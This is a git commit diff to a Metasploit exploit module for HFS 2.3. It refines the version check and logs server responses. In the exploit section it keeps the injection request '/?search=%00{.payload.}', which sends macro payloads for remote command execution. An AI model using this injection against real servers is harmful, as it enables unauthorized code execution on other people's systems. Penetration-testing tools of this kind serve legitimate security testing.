Improve check method

bug/bundler_fix
jvazquez-r7 2014-10-08 12:03:16 -05:00
parent 25344aeb6a
commit d90fe4f724
1 changed files with 12 additions and 4 deletions

View File

@ -60,8 +60,13 @@ class Metasploit3 < Msf::Exploit::Remote
'uri' => '/'
})
if res && res.headers['Server'] && res.headers['Server'] =~ /HFS 2\.3/
return Exploit::CheckCode::Detected
if res && res.headers['Server'] && res.headers['Server'] =~ /HFS ([\d.]+)/
version = $1
if Gem::Version.new(version) <= Gem::Version.new("2.3")
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
else
return Exploit::CheckCode::Safe
end
@ -98,10 +103,13 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Sending a malicious request to #{target_uri.path}")
payloads.each do |payload|
send_request_raw({
res = send_request_raw({
'method' => 'GET',
'uri' => "/?search=%00{.#{URI::encode(payload)}.}"
})
})
if res
print_status("#{res.code}\n#{res.body.to_s}")
end
end
register_file_for_cleanup("#{datastore['SAVE_PATH']}#{file_full_name}")
end